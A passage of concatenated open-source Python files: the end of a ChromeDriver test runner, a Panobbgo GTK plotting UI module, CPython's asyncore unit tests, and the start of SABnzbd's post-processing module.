self.CreateDriver("http://127.0.0.1:" + str(chromedriver_server.GetPort())) if has_ipv6: self.CreateDriver('http://[::1]:' + str(chromedriver_server.GetPort())) class JavaScriptTests(ChromeDriverBaseTestWithWebServer): def GetFileUrl(self, filename): return 'file://' + self.js_root + filename def setUp(self): self._driver = self.CreateDriver() self.js_root = os.path.dirname(os.path.realpath(__file__)) + '/../js/' self._driver.SetWindowRect(640, 480, 0, 0) def checkTestResult(self): def getStatus(): return self._driver.ExecuteScript('return window.CDCJStestRunStatus') self.WaitForCondition(getStatus) self.assertEquals('PASS', getStatus()) def testAllJS(self): self._driver.Load(self.GetFileUrl('call_function_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('dispatch_touch_event_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('execute_async_script_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('execute_script_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('get_element_location_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('get_element_region_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('is_option_element_toggleable_test.html')) self.checkTestResult() self._driver.Load(self.GetFileUrl('focus_test.html')) self.checkTestResult() # 'Z' in the beginning is to make test executed in the end of suite. class ZChromeStartRetryCountTest(unittest.TestCase): def testChromeStartRetryCount(self): self.assertEquals(0, chromedriver.ChromeDriver.retry_count, "Chrome was retried to start during suite execution " "in following tests:\n" + ', \n'.join(chromedriver.ChromeDriver.retried_tests)) if __name__ == '__main__': parser = optparse.OptionParser() parser.add_option( '', '--chromedriver', help='Path to chromedriver server (REQUIRED!)') parser.add_option( '', '--log-path', help='Output verbose server logs to this file') parser.add_option( '', '--replayable', help="Don't truncate long strings in the log so that the log can be " "replayed.") parser.add_option( '', '--chrome', help='Path to a build of the chrome binary') parser.add_option( '', '--filter', type='string', default='', help='Filter for specifying what tests to run, \"*\" will run all,' 'including tests excluded by default. E.g., *testRunMethod') parser.add_option( '', '--android-package', help=('Android package key. Possible values: ' + str(_ANDROID_NEGATIVE_FILTER.keys()))) parser.add_option( '', '--isolated-script-test-output', help='JSON output file used by swarming') parser.add_option( '', '--test-type', help='Select type of tests to run. Possible value: integration') options, args = parser.parse_args() if options.chromedriver is None: parser.error('--chromedriver is required.\n' + 'Please run "%s --help" for help' % __file__) options.chromedriver = util.GetAbsolutePathOfUserPath(options.chromedriver) if (not os.path.exists(options.chromedriver) and util.GetPlatformName() == 'win' and not options.chromedriver.lower().endswith('.exe')): options.chromedriver = options.chromedriver + '.exe' if not os.path.exists(options.chromedriver): parser.error('Path given by --chromedriver is invalid.\n' + 'Please run "%s --help" for help' % __file__) if options.replayable and not options.log_path: parser.error('Need path specified when replayable log set to true.') # When running in commit queue & waterfall, minidump will need to write to # same directory as log, so use the same path global _MINIDUMP_PATH if options.log_path: _MINIDUMP_PATH = os.path.dirname(options.log_path) global _CHROMEDRIVER_BINARY _CHROMEDRIVER_BINARY = util.GetAbsolutePathOfUserPath(options.chromedriver) if (options.android_package and options.android_package not in _ANDROID_NEGATIVE_FILTER): parser.error('Invalid --android-package') global chromedriver_server chromedriver_server = server.Server(_CHROMEDRIVER_BINARY, options.log_path, replayable=options.replayable) global _CHROMEDRIVER_SERVER_PID _CHROMEDRIVER_SERVER_PID = chromedriver_server.GetPid() global _CHROMEDRIVER_SERVER_URL _CHROMEDRIVER_SERVER_URL = chromedriver_server.GetUrl() global _CHROME_BINARY if options.chrome: _CHROME_BINARY = util.GetAbsolutePathOfUserPath(options.chrome) else: # In some test environments (such as commit queue), it's not convenient to # specify Chrome binary location on the command line. Try to use heuristics # to locate the Chrome binary next to the ChromeDriver binary. driver_path = os.path.dirname(_CHROMEDRIVER_BINARY) chrome_path = None platform = util.GetPlatformName() if platform == 'linux': chrome_path = os.path.join(driver_path, 'chrome') elif platform == 'mac': if os.path.exists(os.path.join(driver_path, 'Google Chrome.app')): chrome_path = os.path.join(driver_path, 'Google Chrome.app', 'Contents', 'MacOS', 'Google Chrome') else: chrome_path = os.path.join(driver_path, 'Chromium.app', 'Contents', 'MacOS', 'Chromium') elif platform == 'win': chrome_path = os.path.join(driver_path, 'chrome.exe') if chrome_path is not None and os.path.exists(chrome_path): _CHROME_BINARY = chrome_path else: _CHROME_BINARY = None global _ANDROID_PACKAGE_KEY _ANDROID_PACKAGE_KEY = options.android_package if _ANDROID_PACKAGE_KEY: devil_chromium.Initialize() if options.filter == '': if _ANDROID_PACKAGE_KEY: negative_filter = _ANDROID_NEGATIVE_FILTER[_ANDROID_PACKAGE_KEY] else: negative_filter = _GetDesktopNegativeFilter() if options.test_type is not None: if options.test_type == 'integration': negative_filter += _INTEGRATION_NEGATIVE_FILTER else: parser.error('Invalid --test-type. Valid value: integration') options.filter = '*-' + ':__main__.'.join([''] + negative_filter) all_tests_suite = unittest.defaultTestLoader.loadTestsFromModule( sys.modules[__name__]) test_suite = unittest_util.FilterTestSuite(all_tests_suite, options.filter) test_suites = [test_suite] ChromeDriverBaseTestWithWebServer.GlobalSetUp() runner = unittest.TextTestRunner( stream=sys.stdout, descriptions=False, verbosity=2, resultclass=unittest_util.AddSuccessTextTestResult) result = runner.run(test_suite) results = [result] num_failed = len(result.failures) + len(result.errors) # Limit fail tests to 10 to avoid real bug causing many tests to fail # Only enable retry for automated bot test if (num_failed > 0 and num_failed <= 10 and options.test_type == 'integration'): retry_test_suite = unittest.TestSuite() for f in result.failures: retry_test_suite.addTest(f[0]) for e in result.errors: retry_test_suite.addTest(e[0]) test_suites.append(retry_test_suite) print '\nRetrying failed tests\n' retry_result = runner.run(retry_test_suite) results.append(retry_result) ChromeDriverBaseTestWithWebServer.GlobalTearDown() if options.isolated_script_test_output: util.WriteResultToJSONFile(test_suites, results, options.isolated_script_test_output) util.TryUploadingResultToResultSink(results) sys.exit(len(results[-1].failures) + len(results[-1].errors))
ui.py
# -*- coding: utf-8 -*- # Copyright 2012 Harald Schilly <harald.schilly@univie.ac.at> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. r""" User Interface -------------- This draws a window and plots graphs. .. figure:: img/ui1.png :scale: 75 % """ from threading import Thread from .core import Module try: import pygtk pygtk.require('2.0') except: print("WARNING: no module pygtk installed") try: import gtk from gtk import gdk gtk_Window = gtk.Window except: print("WARNING: no module gtk installed") # create a mock metaclass gtk_Window = type("Mock_gtk_Window", tuple(), {}) import matplotlib import os if os.environ.get("TRAVIS") == "true": matplotlib.use('Agg') # 'GTKAgg' or 'GTK', or 'Agg' ? from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas else: try: matplotlib.use('GTKAgg') # 'GTKAgg' or 'GTK', or 'Agg' ? from matplotlib.backends.backend_gtkagg import FigureCanvasGTKAgg as FigureCanvas from matplotlib.backends.backend_gtkagg import NavigationToolbar2GTKAgg as NavigationToolbar except Exception as ex: print("ERROR: not able to initialize GTKAgg: %s" % ex) del os # from matplotlib.widgets import Slider, Cursor # SpanSelector # from matplotlib.axes import Axes class UI(Module, gtk_Window, Thread): r""" UI """ def __init__(self): Module.__init__(self) gtk.Window.__init__(self, gtk.WINDOW_TOPLEVEL) # fill current window screen = self.get_screen() monitor = screen.get_monitor_at_window(self.get_root_window()) geom = screen.get_monitor_geometry(monitor) self.set_resize_mode(gtk.RESIZE_QUEUE) s = min([int(_ * .8) for _ in [geom.width, geom.height]]) self.resize(int(s * 4. / 3.), s) self._canvases = set() # centered self.set_position(gtk.WIN_POS_CENTER) Thread.__init__(self) @staticmethod def mk_canvas(): """ Creates a FigureCanvas, ready to be added to a gtk layout element """ from matplotlib.figure import Figure fig = Figure(figsize=(10, 10)) return FigureCanvas(fig), fig def show(self): config = self.config self.logger = config.get_logger("UI") self.set_default_size(900, 800) self.connect('destroy', self.destroy) self.set_title( 'Panobbgo %s@%s' % (config.version, config.git_head[:8])) self.set_border_width(0) self.top_hbox = gtk.HBox(False, 0) self.notebook = notebook = gtk.Notebook() notebook.set_tab_pos(gtk.POS_LEFT) self.top_hbox.add(notebook) notebook.show() self.add(self.top_hbox) self.add_events(gdk.BUTTON_PRESS_MASK | gdk.KEY_PRESS_MASK | gdk.KEY_RELEASE_MASK) self.show_all() gdk.threads_init() # def run_gtk_main(): # self.mt = Thread(target=run_gtk_main) # self.mt.start() self.start() self._auto_redraw() def _auto_redraw(self): def task(): while True: gtk.threads_enter() try: [c.draw_idle() for c in self._canvases if c._need_redraw] finally: gtk.threads_leave() from IPython.utils.timing import time time.sleep(self.config.ui_redraw_delay) self.t = Thread(target=task) self.t.daemon = True self.t.start() def redraw_canvas(self, c): """ If your canvas needs to be redrawn, pass it into this function. """ assert isinstance(c, FigureCanvas) self._canvases.add(c) c._need_redraw = True def add_notebook_page(self, label_text, frame): assert label_text is not None and frame is not None label = gtk.Label(label_text) self.notebook.append_page(frame, label) frame.show_all() self.notebook.show_all() def run(self): gtk.threads_enter() gtk.main() gtk.threads_leave() def destroy(self, win): self.logger.info("window destroyed") gtk.main_quit() def finish(self): """ called by base strategy in _cleanup for shutdown """ # plt.ioff() self.join() # not necessary, since not a daemon
test_asyncore.py
import asyncore import unittest import select import os import socket import sys import time import errno import struct from test import support from io import BytesIO if support.PGO: raise unittest.SkipTest("test is not helpful for PGO") try: import threading except ImportError: threading = None TIMEOUT = 3 HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX') class dummysocket: def __init__(self): self.closed = False def close(self): self.closed = True def fileno(self): return 42 class dummychannel: def __init__(self): self.socket = dummysocket() def close(self): self.socket.close() class exitingdummy: def __init__(self): pass def handle_read_event(self): raise asyncore.ExitNow() handle_write_event = handle_read_event handle_close = handle_read_event handle_expt_event = handle_read_event class crashingdummy: def __init__(self): self.error_handled = False def handle_read_event(self): raise Exception() handle_write_event = handle_read_event handle_close = handle_read_event handle_expt_event = handle_read_event def handle_error(self): self.error_handled = True # used when testing senders; just collects what it gets until newline is sent def capture_server(evt, buf, serv): try: serv.listen() conn, addr = serv.accept() except socket.timeout: pass else: n = 200 start = time.time() while n > 0 and time.time() - start < 3.0: r, w, e = select.select([conn], [], [], 0.1) if r: n -= 1 data = conn.recv(10) # keep everything except for the newline terminator buf.write(data.replace(b'\n', b'')) if b'\n' in data: break time.sleep(0.01) conn.close() finally: serv.close() evt.set() def bind_af_aware(sock, addr): """Helper function to bind a socket according to its family.""" if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX: # Make sure the path doesn't exist. support.unlink(addr) support.bind_unix_socket(sock, addr) else: sock.bind(addr) class HelperFunctionTests(unittest.TestCase): def test_readwriteexc(self): # Check exception handling behavior of read, write and _exception # check that ExitNow exceptions in the object handler method # bubbles all the way up through asyncore read/write/_exception calls tr1 = exitingdummy() self.assertRaises(asyncore.ExitNow, asyncore.read, tr1) self.assertRaises(asyncore.ExitNow, asyncore.write, tr1) self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1) # check that an exception other than ExitNow in the object handler # method causes the handle_error method to get called tr2 = crashingdummy() asyncore.read(tr2) self.assertEqual(tr2.error_handled, True) tr2 = crashingdummy() asyncore.write(tr2) self.assertEqual(tr2.error_handled, True) tr2 = crashingdummy() asyncore._exception(tr2) self.assertEqual(tr2.error_handled, True) # asyncore.readwrite uses constants in the select module that # are not present in Windows systems (see this thread: # http://mail.python.org/pipermail/python-list/2001-October/109973.html) # These constants should be present as long as poll is available @unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required') def test_readwrite(self): # Check that correct methods are called by readwrite() attributes = ('read', 'expt', 'write', 'closed', 'error_handled') expected = ( (select.POLLIN, 'read'), (select.POLLPRI, 'expt'), (select.POLLOUT, 'write'), (select.POLLERR, 'closed'), (select.POLLHUP, 'closed'), (select.POLLNVAL, 'closed'), ) class testobj: def __init__(self): self.read = False self.write = False self.closed = False self.expt = False self.error_handled = False def handle_read_event(self): self.read = True def handle_write_event(self): self.write = True def handle_close(self): self.closed = True def handle_expt_event(self): self.expt = True def handle_error(self): self.error_handled = True for flag, expectedattr in expected: tobj = testobj() self.assertEqual(getattr(tobj, expectedattr), False) asyncore.readwrite(tobj, flag) # Only the attribute modified by the routine we expect to be # called should be True. for attr in attributes: self.assertEqual(getattr(tobj, attr), attr==expectedattr) # check that ExitNow exceptions in the object handler method # bubbles all the way up through asyncore readwrite call tr1 = exitingdummy() self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag) # check that an exception other than ExitNow in the object handler # method causes the handle_error method to get called tr2 = crashingdummy() self.assertEqual(tr2.error_handled, False) asyncore.readwrite(tr2, flag) self.assertEqual(tr2.error_handled, True) def test_closeall(self): self.closeall_check(False) def test_closeall_default(self): self.closeall_check(True) def closeall_check(self, usedefault): # Check that close_all() closes everything in a given map l = [] testmap = {} for i in range(10): c = dummychannel() l.append(c) self.assertEqual(c.socket.closed, False) testmap[i] = c if usedefault: socketmap = asyncore.socket_map try: asyncore.socket_map = testmap asyncore.close_all() finally: testmap, asyncore.socket_map = asyncore.socket_map, socketmap else: asyncore.close_all(testmap) self.assertEqual(len(testmap), 0) for c in l: self.assertEqual(c.socket.closed, True) def test_compact_traceback(self): try: raise Exception("I don't like spam!") except: real_t, real_v, real_tb = sys.exc_info() r = asyncore.compact_traceback() else: self.fail("Expected exception") (f, function, line), t, v, info = r self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py') self.assertEqual(function, 'test_compact_traceback') self.assertEqual(t, real_t) self.assertEqual(v, real_v) self.assertEqual(info, '[%s|%s|%s]' % (f, function, line)) class DispatcherTests(unittest.TestCase): def setUp(self): pass def tearDown(self): asyncore.close_all() def test_basic(self): d = asyncore.dispatcher() self.assertEqual(d.readable(), True) self.assertEqual(d.writable(), True) def test_repr(self): d = asyncore.dispatcher() self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d)) def test_log(self): d = asyncore.dispatcher() # capture output of dispatcher.log() (to stderr) l1 = "Lovely spam! Wonderful spam!" l2 = "I don't like spam!" with support.captured_stderr() as stderr: d.log(l1) d.log(l2) lines = stderr.getvalue().splitlines() self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2]) def test_log_info(self): d = asyncore.dispatcher() # capture output of dispatcher.log_info() (to stdout via print) l1 = "Have you got anything without spam?" l2 = "Why can't she have egg bacon spam and sausage?" l3 = "THAT'S got spam in it!" with support.captured_stdout() as stdout: d.log_info(l1, 'EGGS') d.log_info(l2) d.log_info(l3, 'SPAM') lines = stdout.getvalue().splitlines() expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3] self.assertEqual(lines, expected) def test_unhandled(self): d = asyncore.dispatcher() d.ignore_log_types = () # capture output of dispatcher.log_info() (to stdout via print) with support.captured_stdout() as stdout: d.handle_expt() d.handle_read() d.handle_write() d.handle_connect() lines = stdout.getvalue().splitlines() expected = ['warning: unhandled incoming priority event', 'warning: unhandled read event', 'warning: unhandled write event', 'warning: unhandled connect event'] self.assertEqual(lines, expected) def test_strerror(self): # refers to bug #8573 err = asyncore._strerror(errno.EPERM) if hasattr(os, 'strerror'): self.assertEqual(err, os.strerror(errno.EPERM)) err = asyncore._strerror(-1) self.assertTrue(err != "") class dispatcherwithsend_noread(asyncore.dispatcher_with_send): def readable(self): return False def handle_connect(self): pass class DispatcherWithSendTests(unittest.TestCase): def setUp(self): pass def tearDown(self): asyncore.close_all() @unittest.skipUnless(threading, 'Threading required for this test.') @support.reap_threads def test_send(self): evt = threading.Event() sock = socket.socket() sock.settimeout(3) port = support.bind_port(sock) cap = BytesIO() args = (evt, cap, sock) t = threading.Thread(target=capture_server, args=args) t.start() try: # wait a little longer for the server to initialize (it sometimes # refuses connections on slow machines without this wait) time.sleep(0.2) data = b"Suppose there isn't a 16-ton weight?" d = dispatcherwithsend_noread() d.create_socket() d.connect((support.HOST, port)) # give time for socket to connect time.sleep(0.1) d.send(data) d.send(data) d.send(b'\n') n = 1000 while d.out_buffer and n > 0: asyncore.poll() n -= 1 evt.wait() self.assertEqual(cap.getvalue(), data*2) finally: t.join(timeout=TIMEOUT) if t.is_alive(): self.fail("join() timed out") @unittest.skipUnless(hasattr(asyncore, 'file_wrapper'), 'asyncore.file_wrapper required') class FileWrapperTest(unittest.TestCase): def setUp(self): self.d = b"It's not dead, it's sleeping!" with open(support.TESTFN, 'wb') as file: file.write(self.d) def tearDown(self): support.unlink(support.TESTFN) def test_recv(self): fd = os.open(support.TESTFN, os.O_RDONLY) w = asyncore.file_wrapper(fd) os.close(fd) self.assertNotEqual(w.fd, fd) self.assertNotEqual(w.fileno(), fd) self.assertEqual(w.recv(13), b"It's not dead") self.assertEqual(w.read(6), b", it's") w.close() self.assertRaises(OSError, w.read, 1) def test_send(self): d1 = b"Come again?" d2 = b"I want to buy some cheese." fd = os.open(support.TESTFN, os.O_WRONLY | os.O_APPEND) w = asyncore.file_wrapper(fd) os.close(fd) w.write(d1) w.send(d2) w.close() with open(support.TESTFN, 'rb') as file: self.assertEqual(file.read(), self.d + d1 + d2) @unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'), 'asyncore.file_dispatcher required') def test_dispatcher(self): fd = os.open(support.TESTFN, os.O_RDONLY) data = [] class FileDispatcher(asyncore.file_dispatcher): def handle_read(self): data.append(self.recv(29)) s = FileDispatcher(fd) os.close(fd) asyncore.loop(timeout=0.01, use_poll=True, count=2) self.assertEqual(b"".join(data), self.d) def test_resource_warning(self): # Issue #11453 fd = os.open(support.TESTFN, os.O_RDONLY) f = asyncore.file_wrapper(fd) os.close(fd) with support.check_warnings(('', ResourceWarning)): f = None support.gc_collect() def test_close_twice(self): fd = os.open(support.TESTFN, os.O_RDONLY) f = asyncore.file_wrapper(fd) os.close(fd) f.close() self.assertEqual(f.fd, -1) # calling close twice should not fail f.close() class BaseTestHandler(asyncore.dispatcher): def __init__(self, sock=None): asyncore.dispatcher.__init__(self, sock) self.flag = False def handle_accept(self): raise Exception("handle_accept not supposed to be called") def handle_accepted(self): raise Exception("handle_accepted not supposed to be called") def handle_connect(self): raise Exception("handle_connect not supposed to be called") def handle_expt(self): raise Exception("handle_expt not supposed to be called") def handle_close(self): raise Exception("handle_close not supposed to be called") def handle_error(self): raise class BaseServer(asyncore.dispatcher): """A server which listens on an address and dispatches the connection to a handler. """ def __init__(self, family, addr, handler=BaseTestHandler): asyncore.dispatcher.__init__(self) self.create_socket(family) self.set_reuse_addr() bind_af_aware(self.socket, addr) self.listen(5) self.handler = handler @property def address(self): return self.socket.getsockname() def handle_accepted(self, sock, addr): self.handler(sock) def handle_error(self): raise class BaseClient(BaseTestHandler): def __init__(self, family, address): BaseTestHandler.__init__(self) self.create_socket(family) self.connect(address) def handle_connect(self): pass class BaseTestAPI: def tearDown(self): asyncore.close_all(ignore_all=True) def loop_waiting_for_flag(self, instance, timeout=5): timeout = float(timeout) / 100 count = 100 while asyncore.socket_map and count > 0: asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll) if instance.flag: return count -= 1 time.sleep(timeout) self.fail("flag not set") def test_handle_connect(self): # make sure handle_connect is called on connect() class TestClient(BaseClient): def handle_connect(self): self.flag = True server = BaseServer(self.family, self.addr) client = TestClient(self.family, server.address) self.loop_waiting_for_flag(client) def test_handle_accept(self): # make sure handle_accept() is called when a client connects class TestListener(BaseTestHandler): def __init__(self, family, addr): BaseTestHandler.__init__(self) self.create_socket(family) bind_af_aware(self.socket, addr) self.listen(5) self.address = self.socket.getsockname() def handle_accept(self): self.flag = True server = TestListener(self.family, self.addr) client = BaseClient(self.family, server.address) self.loop_waiting_for_flag(server) def test_handle_accepted(self): # make sure handle_accepted() is called when a client connects class TestListener(BaseTestHandler): def __init__(self, family, addr): BaseTestHandler.__init__(self) self.create_socket(family) bind_af_aware(self.socket, addr) self.listen(5) self.address = self.socket.getsockname() def handle_accept(self): asyncore.dispatcher.handle_accept(self) def handle_accepted(self, sock, addr): sock.close() self.flag = True server = TestListener(self.family, self.addr) client = BaseClient(self.family, server.address) self.loop_waiting_for_flag(server) def test_handle_read(self): # make sure handle_read is called on data received class TestClient(BaseClient): def handle_read(self): self.flag = True class TestHandler(BaseTestHandler): def __init__(self, conn): BaseTestHandler.__init__(self, conn) self.send(b'x' * 1024) server = BaseServer(self.family, self.addr, TestHandler) client = TestClient(self.family, server.address) self.loop_waiting_for_flag(client) def test_handle_write(self): # make sure handle_write is called class TestClient(BaseClient): def handle_write(self): self.flag = True server = BaseServer(self.family, self.addr) client = TestClient(self.family, server.address) self.loop_waiting_for_flag(client) def test_handle_close(self): # make sure handle_close is called when the other end closes # the connection class TestClient(BaseClient): def handle_read(self): # in order to make handle_close be called we are supposed # to make at least one recv() call self.recv(1024) def handle_close(self): self.flag = True self.close() class TestHandler(BaseTestHandler): def __init__(self, conn): BaseTestHandler.__init__(self, conn) self.close() server = BaseServer(self.family, self.addr, TestHandler) client = TestClient(self.family, server.address) self.loop_waiting_for_flag(client) def test_handle_close_after_conn_broken(self): # Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and # #11265). data = b'\0' * 128 class TestClient(BaseClient): def handle_write(self): self.send(data) def handle_close(self): self.flag = True self.close() def handle_expt(self): self.flag = True self.close() class TestHandler(BaseTestHandler): def handle_read(self): self.recv(len(data)) self.close() def writable(self): return False server = BaseServer(self.family, self.addr, TestHandler) client = TestClient(self.family, server.address) self.loop_waiting_for_flag(client) @unittest.skipIf(sys.platform.startswith("sunos"), "OOB support is broken on Solaris") def test_handle_expt(self): # Make sure handle_expt is called on OOB data received. # Note: this might fail on some platforms as OOB data is # tenuously supported and rarely used. if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX: self.skipTest("Not applicable to AF_UNIX sockets.") if sys.platform == "darwin" and self.use_poll: self.skipTest("poll may fail on macOS; see issue #28087") class TestClient(BaseClient): def handle_expt(self): self.socket.recv(1024, socket.MSG_OOB) self.flag = True class TestHandler(BaseTestHandler): def __init__(self, conn): BaseTestHandler.__init__(self, conn) self.socket.send(bytes(chr(244), 'latin-1'), socket.MSG_OOB) server = BaseServer(self.family, self.addr, TestHandler) client = TestClient(self.family, server.address) self.loop_waiting_for_flag(client) def test_handle_error(self): class TestClient(BaseClient): def handle_write(self): 1.0 / 0 def handle_error(self): self.flag = True try: raise except ZeroDivisionError: pass else: raise Exception("exception not raised") server = BaseServer(self.family, self.addr) client = TestClient(self.family, server.address) self.loop_waiting_for_flag(client) def test_connection_attributes(self): server = BaseServer(self.family, self.addr) client = BaseClient(self.family, server.address) # we start disconnected self.assertFalse(server.connected) self.assertTrue(server.accepting) # this can't be taken for granted across all platforms #self.assertFalse(client.connected) self.assertFalse(client.accepting) # execute some loops so that client connects to server asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100) self.assertFalse(server.connected) self.assertTrue(server.accepting) self.assertTrue(client.connected) self.assertFalse(client.accepting) # disconnect the client client.close() self.assertFalse(server.connected) self.assertTrue(server.accepting) self.assertFalse(client.connected) self.assertFalse(client.accepting) # stop serving server.close() self.assertFalse(server.connected) self.assertFalse(server.accepting) def test_create_socket(self): s = asyncore.dispatcher() s.create_socket(self.family) self.assertEqual(s.socket.family, self.family) SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0) sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK if hasattr(socket, 'SOCK_CLOEXEC'): self.assertIn(s.socket.type, (sock_type | socket.SOCK_CLOEXEC, sock_type)) else: self.assertEqual(s.socket.type, sock_type) def test_bind(self): if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX: self.skipTest("Not applicable to AF_UNIX sockets.") s1 = asyncore.dispatcher() s1.create_socket(self.family) s1.bind(self.addr) s1.listen(5) port = s1.socket.getsockname()[1] s2 = asyncore.dispatcher() s2.create_socket(self.family) # EADDRINUSE indicates the socket was correctly bound self.assertRaises(OSError, s2.bind, (self.addr[0], port)) def test_set_reuse_addr(self): if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX: self.skipTest("Not applicable to AF_UNIX sockets.") with socket.socket(self.family) as sock: try: sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) except OSError: unittest.skip("SO_REUSEADDR not supported on this platform") else: # if SO_REUSEADDR succeeded for sock we expect asyncore # to do the same s = asyncore.dispatcher(socket.socket(self.family)) self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)) s.socket.close() s.create_socket(self.family) s.set_reuse_addr() self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)) @unittest.skipUnless(threading, 'Threading required for this test.') @support.reap_threads def test_quick_connect(self): # see: http://bugs.python.org/issue10340 if self.family not in (socket.AF_INET, getattr(socket, "AF_INET6", object())): self.skipTest("test specific to AF_INET and AF_INET6") server = BaseServer(self.family, self.addr) # run the thread 500 ms: the socket should be connected in 200 ms t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1, count=5)) t.start() try: with socket.socket(self.family, socket.SOCK_STREAM) as s: s.settimeout(.2) s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) try: s.connect(server.address) except OSError: pass finally: t.join(timeout=TIMEOUT) if t.is_alive(): self.fail("join() timed out") class TestAPI_UseIPv4Sockets(BaseTestAPI): family = socket.AF_INET addr = (support.HOST, 0) @unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 support required') class TestAPI_UseIPv6Sockets(BaseTestAPI): family = socket.AF_INET6 addr = (support.HOSTv6, 0) @unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required') class TestAPI_UseUnixSockets(BaseTestAPI): if HAS_UNIX_SOCKETS: family = socket.AF_UNIX addr = support.TESTFN def tearDown(self): support.unlink(self.addr) BaseTestAPI.tearDown(self) class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase): use_poll = False @unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required') class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase): use_poll = True class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase): use_poll = False @unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required') class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase): use_poll = True class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase): use_poll = False @unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required') class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase): use_poll = True if __name__ == "__main__": unittest.main()
postproc.py
#!/usr/bin/python3 -OO # Copyright 2007-2019 The SABnzbd-Team <team@sabnzbd.org> # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. """ sabnzbd.postproc - threaded post-processing of jobs """ import os import logging import sabnzbd import xml.sax.saxutils import functools import time import re import queue from sabnzbd.newsunpack import unpack_magic, par2_repair, external_processing, \ sfv_check, build_filelists, rar_sort from threading import Thread from sabnzbd.misc import on_cleanup_list from sabnzbd.filesystem import real_path, get_unique_path, move_to_path, \ make_script_path, long_path, clip_path, renamer, remove_dir, globber, \ globber_full, set_permissions, cleanup_empty_directories, fix_unix_encoding, \ sanitize_and_trim_path, sanitize_files_in_folder, remove_file, recursive_listdir, setname_from_path, \ create_all_dirs, get_unique_filename from sabnzbd.sorting import Sorter from sabnzbd.constants import REPAIR_PRIORITY, TOP_PRIORITY, POSTPROC_QUEUE_FILE_NAME, \ POSTPROC_QUEUE_VERSION, sample_match, JOB_ADMIN, Status, VERIFIED_FILE from sabnzbd.rating import Rating import sabnzbd.emailer as emailer import sabnzbd.dirscanner as dirscanner import sabnzbd.downloader import sabnzbd.config as config import sabnzbd.cfg as cfg import sabnzbd.nzbqueue import sabnzbd.database as database import sabnzbd.notifier as notifier import sabnzbd.utils.rarfile as rarfile import sabnzbd.utils.rarvolinfo as rarvolinfo import sabnzbd.utils.checkdir MAX_FAST_JOB_COUNT = 3 # Match samples RE_SAMPLE = re.compile(sample_match, re.I) class PostProcessor(Thread): """ PostProcessor thread, designed as Singleton """ do = None # Link to instance of the thread def __init__(self): """ Initialize PostProcessor thread """ Thread.__init__(self) # This history queue is simply used to log what active items to display in the web_ui self.load() if self.history_queue is None: self.history_queue = [] # Fast-queue for jobs already finished by DirectUnpack self.fast_queue = queue.Queue() # Regular queue for jobs that might need more attention self.slow_queue = queue.Queue() # Load all old jobs for nzo in self.history_queue: self.process(nzo) # Counter to not only process fast-jobs self.__fast_job_count = 0 # State variables self.__stop = False self.__busy = False self.paused = False PostProcessor.do = self def save(self): """ Save postproc queue """ logging.info("Saving postproc queue") sabnzbd.save_admin((POSTPROC_QUEUE_VERSION, self.history_queue), POSTPROC_QUEUE_FILE_NAME) def load(self): """ Save postproc queue """ self.history_queue = [] logging.info("Loading postproc queue") data = sabnzbd.load_admin(POSTPROC_QUEUE_FILE_NAME) if data is None: return try: version, history_queue = data if POSTPROC_QUEUE_VERSION != version: logging.warning(T('Old queue detected, use Status->Repair to convert the queue')) elif isinstance(history_queue, list): self.history_queue = 